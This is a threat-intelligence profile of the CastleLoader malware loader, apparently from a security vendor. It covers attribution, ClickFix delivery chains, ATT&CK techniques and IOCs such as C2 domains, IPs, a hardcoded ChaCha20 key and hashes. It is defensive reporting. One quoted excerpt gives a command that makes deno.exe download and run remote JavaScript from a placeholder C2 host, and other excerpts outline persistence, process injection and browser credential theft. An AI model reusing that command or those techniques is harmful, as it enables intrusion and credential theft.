CastleLoader
CastleLoader is a modular malware loader sold under a malware-as-a-service model and used by multiple affiliates and threat clusters. Reporting links it most consistently to the actor tracked as GrayBravo, formerly TAG-150, and some research also notes overlaps with MuddyWater through shared code-signing certificates and delivery chains involving FakeSet. It has been used in campaigns targeting government entities, U.S. government agencies, critical infrastructure, IT firms, logistics companies, and multiple other industries.
Observed delivery vectors include ClickFix social-engineering chains, bogus GitHub and SourceForge repositories, fake installers, Deno-based multi-stage chains, NSIS installers, and infection flows using Inno Setup and AutoIt. Multiple reports describe users being tricked into executing commands copied from fake CAPTCHA or software-installation pages. CastleLoader has also been delivered by FakeSet and used in chains that ultimately deploy LummaC2, NetSupport RAT, Rhadamanthys, StealC, RedLine, DeerStealer, SectopRAT, and CastleRAT; one report also describes an in-memory .NET stealer dubbed CastleStealer delivered as a task from CastleLoader.
Technically, CastleLoader is described as a stealthy first-stage loader focused on flexible payload deployment and in-memory execution. Reported behaviors include configuration decryption in heap memory, RC4-encrypted next-stage retrieval, ChaCha20- or ChaCha-encrypted C2 traffic, custom serialized tasking, host profiling, anti-VM checks, optional screenshot capture, installed-AV enumeration, and execution-status reporting. Specific analyses describe hashed API resolution, XOR-obfuscated strings, reflective PE loading, direct ntdll syscall usage, ReplaceTextW callback execution, process hollowing, and geofencing or language/location checks. It has been observed collecting host metadata such as username, computer name, domain name, Windows version, architecture, and antivirus products before requesting tasks.
Infrastructure and indicators directly mentioned in the content include C2 domains and URLs such as maybedontbanplease[.]com, trindastal[.]com, sedaliarealty[.]net, and historical infrastructure at 94[.]159[.]113[.]32 and 38[.]180[.]136[.]139. One report states CastleLoader used the User-Agent string "GoogeBot." Additional indicators include campaign UUID b47e1791-82ba-544f-9aab-ebbdd36d8c89, auth token D63TnQ3WhSnjI0yVKaILRu8U1WttdnE, instance ID YvAPcF0OnjSYuDW7QosQ, hardcoded ChaCha20 key f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb, nonce bbbbf632514c0caae655b2c4, and sample hash bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92 for the CastleLoader core. Related certificate artifacts mentioned in reporting include Common Names Amy Cherne and Donald Gay, and an EV-signed NSIS sample using a certificate issued to SERPENTINE SOLAR LIMITED.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Threat actor TAG-150 has advanced its CastleLoader malware operations with the development of a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment.
Another malware family linked to MuddyWater is a downloader called FakeSet, which the security researchers say was used in recent infections to deliver CastleLoader. CastleLoader is sold as a service to multiple affiliates and cyber crews.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model.
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesThe campaign employs a multi-stage phishing delivery chain that impersonates trusted employment and professional networking platforms, such as LinkedIn and Indeed, to lure victims.
The attack chain begins with phishing URLs hosted on typosquatted domains impersonating legitimate job and professional networking platforms such as LinkedIn and Indeed.
Execution
8 techniquesThe first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
They instruct the operator to open the Windows Run dialog box or PowerShell terminal and cut and paste malware code into the system to "fix" the problem.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Lastly, the renamed Python interpreter will be used to execute inline Python code.
The following stage is executed with the downloaded Deno executable: ... deno.exe run -A http://{C2}/{random_path}.js
In this case, the bytecode file is another in-memory loader that uses the Windows ctypes interface to execute shellcode received from a local named pipe.
When the user interacts with the fake CAPTCHA box, a payload gets copied to the clipboard via the classic document.execCommand("copy") method.
The initial payload is executed using a command that invokes cmd.exe with a minimized window and uses process output from the caret-obfuscated finger utility.
Persistence
2 techniquesThe first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
Privilege Escalation
5 techniquesThe first task is a NetSupport RAT delivery ... write to %ProgramData%\CeoliauD\Dabkina, register as a Scheduled Task with logon trigger so the payload runs on next login
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
startup_method Persistence mechanism: 1=Registry Run, 2=Startup LNK, 3=Scheduled Task
run_as_admin The malware will relaunch its parent via cmd.exe /c <parent_process> via ShellExecuteW with the "runas" verb to elevate it as Administrator.
Stealth
9 techniquesThe payload downloaded by the renamed Python interpreter is another Python script that performs a Cyrillic substitution operation. Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents.
The malware generates a randomized filename under %LocalAppData% directory and assigns it as a disguised executable path (e.g. 1006326830900030409.com or 1006326830900030409.exe). Next, this file is then used as a renamed copy of the legitimate Windows curl.exe binary.
This directory is also created under %LocalAppData% and mimics a legitimate Python installation structure, depending on the runtime variant being used (embedded CPython or IronPython).
This will be loaded in the memory of the same host python interpreter.
The second task is in-memory only ... launch method 7 for APC injection, fetching net40.bin and injecting the resulting .NET binary into a target process without ever touching disk
Embedded JavaScript dynamically fetches remote content from this endpoint, applies ROT13 to decode the response... Prior to Base64 decoding, the script replaces specific Cyrillic characters with their Latin equivalents... using Base64 encoding, XOR decryption... The first 64 bytes of the downloaded blob are treated as the RC4 key... all C2 communication is encrypted via the symmetric ChaCha algorithm.
Despite differences in tooling and runtime selection, both variants follow the same overall execution chain, including LOLBin abuse, portable Python runtime deployment, staged payload retrieval, and in-memory execution of the next-stage malware payload.
anti_vm Run cpuid instruction to attempt to detect hypervisor (VMware, VirtualBox, Parallels) environments.
After substituting and decoding the Base64 blobs, this Python script implements a classic fileless shellcode, using Base64 encoding, XOR decryption, and direct Windows API calls via ctypes to execute payloads entirely in memory.
Credential Access
2 techniquesFor Chromium-family browsers the stealer reads Login Data ... cookies.sqlite ... Discord is targeted ... Telegram sessions are stolen wholesale by copying the entire tdata directory.
For Chromium-family browsers the stealer reads Login Data (the SQLite password store), cookies.sqlite, and Local State ... CryptUnprotectData specifically to decrypt it.
Discovery
3 techniquesThe loader issues a get_tasks request to its C2 server using generated identifiers of the infected host... along with system profiling data (username, computer_name, domain_name, windows_version, arch, active_av and active_list).
anti_vm Run cpuid instruction to attempt to detect hypervisor (VMware, VirtualBox, Parallels) environments.
get_installed_av Enumerate installed AV products via WMI root\SecurityCenter2 using CoCreateInstance and CoSetProxyBlanket
Collection
3 techniquesmake_screenshots Capture the desktop on bootstrap via the GDI BitBlt pipeline
When the user checks the “I'm not a robot” box, two things happen. First, a payload gets copied to the clipboard via the classic document.execCommand(“copy”).
After decryption, the buffer resolves with a ZIP archive containing the resources of the final payload.
Command and Control
4 techniquesThe resulting decompressed payload reveals behavior consistent with secondary-stage command-and-control (C2) activity. It initiates outbound connections to retrieve additional payloads...
For the initial configuration fetch, the malware issues a GET request to a hardcoded base URL... the loader contacts only the base endpoint and transmits encrypted data within the HTTP POST request body.
Finally, the renamed curl.exe binary is used again to download a legitimate Python runtime archive from trusted upstream sources.
Apart from the malware's initial GET request, all C2 communication is encrypted via the symmetric ChaCha algorithm.
Exfiltration
1 technique...a pair of CastleRAT trojan variants enabling system data exfiltration, command execution, and further payload deployment...
IOCs tracked for this family
112 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
41 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A fileless Malware-as-a-Service loader used in the ClickFix campaign to retrieve configuration, communicate with C2 using ChaCha20 and RC4-based mechanisms, execute tasks, and deliver next-stage payloads including a Python-based RAT.
A malware loader delivered through a Deno-based multi-stage infection chain using the ClickFix lure.
A malware loader observed being delivered through a Deno-based multi-stage infection chain involving the ClickFix lure.
A multi-stage malware loader delivered via a ClickFix-style social engineering chain. It uses finger.exe, BYOI with a legitimate Python embed package, shellcode, reflective PE loading, encrypted C2 traffic, tasking, persistence options, screenshot capture, and multiple launch methods to deliver follow-on payloads including NetSupport RAT and a stealer.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.